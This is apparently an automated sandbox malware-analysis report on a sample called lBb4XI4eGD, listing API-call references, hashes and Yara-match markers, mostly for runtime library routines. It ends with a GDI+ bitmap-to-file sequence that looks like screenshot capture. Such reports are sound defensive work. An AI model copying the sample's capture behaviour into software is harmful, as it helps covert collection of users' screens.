                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                • Instruction ID: c3d8715164f806a544a6595d0d1b5ca3b1b03c9cb929c43e93236755c90d9331
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E11CE32D80228DFCB24EBA0D840AEE77B6BF44724F240519E818B7290DF389A04CF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
                                                                                                                                                                                                                                • int.LIBCPMT ref: 0040C1A7
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040C1E1
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                                                                                                                                                                                • int.LIBCPMT ref: 004054F0
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                                • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                                                                                                                                                                                • int.LIBCPMT ref: 0040558C
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                                • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                                                                                                                                                                                • int.LIBCPMT ref: 00404C32
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00404E60
                                                                                                                                                                                                                                  • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 00404EBA
                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                • String ID: \J@
                                                                                                                                                                                                                                • API String ID: 1836011271-3870157017
                                                                                                                                                                                                                                • Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                                                                                                                                                • Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                                                                                                                                                • Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: pScheduler
                                                                                                                                                                                                                                • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                • Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                • String ID: MOC$RCC$f)D
                                                                                                                                                                                                                                • API String ID: 3472968176-2775210027
                                                                                                                                                                                                                                • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                • Instruction ID: d4fc9d45285e4f3b074d27487ca2deb28c10a463ad65522b3868a22918ec9578
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F04F70980158CFDB15BF65C48476D3B65AF09B00F854091F8485B260CB7D9A48DFA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                • Instruction ID: 427aae89434d98ed8047c360075d44f2a25edee642f47bff0d672d7ae0e0669b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0271C571A892169FCB25DF54C888AFFBB75FF41368F194229E811F7180D7708A61CBA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                                                                                                                                                • Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3033488037-0
                                                                                                                                                                                                                                • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                • Instruction ID: 504f12c46807bebbe0a878a39812dffd79a6b7d2e48448bd56bcfd41d224824e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C651E771A80304AFDB24DF29DC41B6AB7F5EF88724F14456EE809D7250E732EA11CB80
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B3F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B56
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B75
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430B90
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00430BA7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3033488037-0
                                                                                                                                                                                                                                • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                                • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                • Instruction ID: 38c7516a706fa019201d97bf5c8f2c529078bb491f66d278cd8d30043ab504e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A41C132A40314AFCB14DF78C880A6DB7B6EF89714F1545A9E919EB381D731EA01CB81
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00436912
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0043697E
                                                                                                                                                                                                                                  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 313313983-0
                                                                                                                                                                                                                                • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                                • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 0215B142
                                                                                                                                                                                                                                  • Part of subcall function 02151178: _SpinWait.LIBCONCRT ref: 02151190
                                                                                                                                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0215B156
                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0215B188
                                                                                                                                                                                                                                • List.LIBCMT ref: 0215B20B
                                                                                                                                                                                                                                • List.LIBCMT ref: 0215B21A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3281396844-0
                                                                                                                                                                                                                                • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                                • Instruction ID: f982222ac6cdf47170ca87a9a7240facba24b2b20dd5173ebf5ed54482c5a7b1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3316932D89666DFCB14EFA4D9906EDB7B2BF04308F0500AACC2167644CB716A04CFA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _SpinWait.LIBCONCRT ref: 0041AEDB
                                                                                                                                                                                                                                  • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
                                                                                                                                                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEEF
                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF21
                                                                                                                                                                                                                                • List.LIBCMT ref: 0041AFA4
                                                                                                                                                                                                                                • List.LIBCMT ref: 0041AFB3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3281396844-0
                                                                                                                                                                                                                                • Opcode ID: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                                                                                                                                                • Instruction ID: 8a1b27d7ac99c42c423c038c6da62c4f09041a57878ada6c0d5966c490a343f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f58ac660b0453a3e9b818a0a9febcd8ba4b28c7f9e8e1f6154efc2f6275add08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76318B71A02719DFCB10EFA5D5915EEB7B1BF04308F04006FE80167242DB796DA5CB9A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402060
                                                                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000010), ref: 00402068
                                                                                                                                                                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 00402083
                                                                                                                                                                                                                                • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020AD
                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 004020D9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                • String ID:
